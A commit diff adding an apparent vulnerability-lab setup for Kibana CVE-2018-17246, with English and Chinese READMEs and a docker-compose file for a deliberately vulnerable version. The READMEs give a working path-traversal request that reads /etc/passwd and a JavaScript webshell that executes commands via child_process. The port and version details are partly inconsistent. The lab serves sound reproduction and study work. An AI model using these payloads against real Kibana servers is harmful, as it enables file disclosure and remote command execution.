first commit

kibana/CVE-2018-17246/README.md

@@ -0,0 +1,45 @@
+# Kibana Local File Inclusion (CVE-2018-17246)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Kibana is an open source data visualization dashboard for Elasticsearch.
+
+Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
+
+References:
+
+- <https://nvd.nist.gov/vuln/detail/CVE-2018-17246>
+- <https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/>
+
+## Environment Setup
+
+Start the Kibana 5.6.12 and Elasticsearch 5.6.16:
+
+```
+docker compose up -d
+```
+
+After started the environment, the Kibana is listening on `http://your-ip:5106`.
+
+## Vulnerability Reproduction
+
+Send the following request to trigger a basic path traversal:
+
+```
+http://your-ip:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
+```
+
+Though there is nothing response except a error message with the 500 status code, you can see the exception in the `docker compose logs`:
+
+![](1.png)
+
+File `/etc/passwd` is imported successfully.
+
+To exploit this vulnerability, you need to upload a JavaScript webshell to the machine where the Kibana is running, then include it.
+
+```js
+// docker compose exec kibana bash && echo '...code...' > /tmp/vulhub.js
+export default {asJson: function() {return require("child_process").execSync("id").toString()}}
+```
+
+![](2.png)

kibana/CVE-2018-17246/README.zh-cn.md

@@ -0,0 +1,42 @@
+# Kibana Local File Inclusion (CVE-2018-17246)
+
+Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞，通过这个漏洞攻击者可以包含任意服务器上的文件。此时，如果攻击者可以上传一个文件到服务器任意位置，即可执行代码。
+
+参考链接：
+
+- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
+- https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/
+- https://www.anquanke.com/post/id/168291
+
+## 环境搭建
+
+启动 Kibana 5.6.12 和 Elasticsearch 5.6.16 环境：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:5106`即可看到Kibana的默认首页。
+
+## 漏洞复现
+
+直接访问如下URL，来包含文件`/etc/passwd`：
+
+```
+http://your-ip:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
+```
+
+虽然在返回的数据包里只能查看到一个500的错误信息，但是我们通过执行`docker compose logs`即可发现，`/etc/passwd`已经成功被包含：
+
+![](1.png)
+
+所以，我们需要从其他途径往服务器上上传代码，再进行包含从而执行任意命令。比如，我们将如下代码上传到服务器的`/tmp/vulhub.js`：
+
+```js
+// docker compose exec kibana bash && echo '...code...' > /tmp/vulhub.js
+export default {asJson: function() {return require("child_process").execSync("id").toString()}}
+```
+
+成功包含并返回命令执行结果：
+
+![](2.png)

kibana/CVE-2018-17246/docker-compose.yml

@@ -0,0 +1,10 @@
+version: '2'
+services:
+ kibana:
+   image: vulhub/kibana:5.6.12
+   depends_on:
+    - elasticsearch
+   ports:
+    - "5601:5601"
+ elasticsearch:
+   image: vulhub/elasticsearch:5.6.16